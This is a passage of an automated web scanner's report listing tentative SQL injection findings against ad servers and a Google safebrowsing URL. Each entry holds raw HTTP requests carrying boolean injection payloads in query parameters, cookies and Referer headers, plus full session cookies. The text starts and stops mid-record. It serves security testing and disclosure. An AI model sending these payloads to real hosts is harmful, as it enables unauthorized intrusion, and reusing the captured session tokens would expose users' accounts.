P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dJJ8X9w40K63vtRS57Oca;Path=/;
Set-cookie: C=oNJ8X9wxYWVGdgaYa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2
GET /adam/detect?cat=Boston_Herald.Track.Front'%20and%201%3d2--%20&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=oNJ8X9wxYWVGdgaZa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174609135/1248373032/1137740046/4118631499
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://q1.checkm8.com
Path: /adam/detect
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&&&1%20and%201%3d1--%20=1 HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:05 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: A=dvV7X9wRIMMRvENT06Sba;Path=/;
Set-cookie: C=oLK8X9wHI86Ycga5a4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151275073/1225019603/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2
GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&&&1%20and%201%3d2--%20=1 HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:05 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: C=oLK8X9wHI86Ycga6a4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151275073/1225019603/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.17. http://q1.checkm8.com/adam/report [C cookie]
Summary
Severity: High
Confidence: Tentative
Host: http://q1.checkm8.com
Path: /adam/report
Issue detail
The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1 Host: q1.checkm8.com Proxy-Connection: keep-alive Referer: http://bostonherald.com/news/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t'%20and%201%3d1--%20
Response 1
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:50:24 GMT Server: Apache P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC" x-internal-server: 192.168.212.15 NY-AD5 Set-cookie: A=dvV7X9w11Q9MvENT06Sba;Path=/; Set-cookie: C=o7H9X9wRUHZUchaPa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:43 GMT; x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT; Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com x-internal-id: 143418691/1217163655/1137740046/2570514078 x-internal-error: TOO OLD Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html
Request 2
GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1 Host: q1.checkm8.com Proxy-Connection: keep-alive Referer: http://bostonherald.com/news/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t'%20and%201%3d2--%20
Response 2
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:50:24 GMT Server: Apache P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC" x-internal-server: 192.168.212.15 NY-AD5 Set-cookie: C=o7H9X9wRUHZUchaPa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:43 GMT; x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT; Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com x-internal-id: 143418691/1217163655/1137740046/2570514078 x-internal-error: TOO OLD Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html
1.18. http://q1.checkm8.com/adam/report [Referer HTTP header]
Summary
Severity: High
Confidence: Tentative
Host: http://q1.checkm8.com
Path: /adam/report
Issue detail
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 80156717'%20or%201%3d1--%20 and 80156717'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1 Host: q1.checkm8.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=80156717'%20or%201%3d1--%20 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t
Response 1
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:50:38 GMT Server: Apache P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC" x-internal-server: 192.168.212.18 NY-AD8 Set-cookie: A=dvV7X9wiI18ZvENT06Sba;Path=/; Set-cookie: C=omI9X9wB2HY7chadb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:58 GMT; x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT; Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com x-internal-id: 167371135/1241135538/1137740046/2570514078 x-internal-error: TOO OLD Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html
Request 2
GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1 Host: q1.checkm8.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=80156717'%20or%201%3d2--%20 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t
Response 2
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:50:39 GMT Server: Apache P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC" x-internal-server: 192.168.212.18 NY-AD8 Set-cookie: C=omI9X9wB2HY7chaeb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:58 GMT; x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT; Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com x-internal-id: 167371135/1241135538/1137740046/2570514078 x-internal-error: TOO OLD Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html
1.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc [REST URL parameter 1]
Summary
Severity: High
Confidence: Tentative
Host: http://safebrowsing-cache.google.com
Path: /safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /safebrowsing'/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc HTTP/1.1 Host: safebrowsing-cache.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH Pragma: no-cache Cache-Control: no-cache
Response 1
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 17 Sep 2011 11:41:22 GMT Server: sffe Content-Length: 11872 X-XSS-Protection: 1; mode=block
<!DOCTYPE html> <html lang=en> <meta charset=utf-8> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color: ...[SNIP]...
Request 2
GET /safebrowsing''/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc HTTP/1.1 Host: safebrowsing-cache.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH Pragma: no-cache Cache-Control: no-cache
Response 2
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Location: http://www.google.com/sorry/?continue=http://safebrowsing-cache.google.com/safebrowsing%27%27/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc Content-Length: 357 Date: Sat, 17 Sep 2011 11:41:28 GMT Server: GFE/2.0
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/sorry/?con ...[SNIP]...
1.20. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ktextColor parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://showadsak.pubmatic.com
Path: /AdServer/AdServerServlet
Issue detail
The ktextColor parameter appears to be vulnerable to SQL injection attacks. The payloads 21208523%20or%201%3d1--%20 and 21208523%20or%201%3d2--%20 were each submitted in the ktextColor parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=00000021208523%20or%201%3d1--%20&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1 Host: showadsak.pubmatic.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Content-Type: text/html Date: Sat, 17 Sep 2011 01:22:06 GMT Content-Length: 1477 Connection: close Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/
document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA/WgAAAAAAAAAAAAAAAAAAAAAAAAAAAABBgAAAGgMAANgCAABaAAAABwAAAAEAAAABAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=></div>'); document.writeln('<SCRIPT>'); document.writeln('document.write("<scr"+"ipt src=\'http://afe.specificclick.net?l=1966491151&sz=728x90&wr=j&t=j&u="+escape(document.location)+"&r="+escape(document.referrer)+"\'></scri"+"pt>");'); document.writeln('</SCRIPT>'); document.writeln('<NOSCRIPT>'); document.writeln('<A HREF="[default_href]"> <IMG SRC="[default_img_src]" WIDTH=728 HEIGHT=90 border=0 ALT="Click Here!"></IMG></A>'); document.writeln('</NOSCRIPT>'); document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=27330&siteId=27331&adId=23103&adServerId=794&kefact=0.500000&kpbmtpfact=0.000000&kadNetFrequecy=0&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316222526&indirectAdId=32833&adServerOptimizerId=1&ranreq=0.31895528361201286&defaultReq=1&defaultedAdServerId=1053&kadDefNetFreq=0&imprCap=1&pageURL=http://ad.afy11.net/ad"> </iframe>'); |
Request 2
GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=00000021208523%20or%201%3d2--%20&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1 Host: showadsak.pubmatic.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES
Response 2
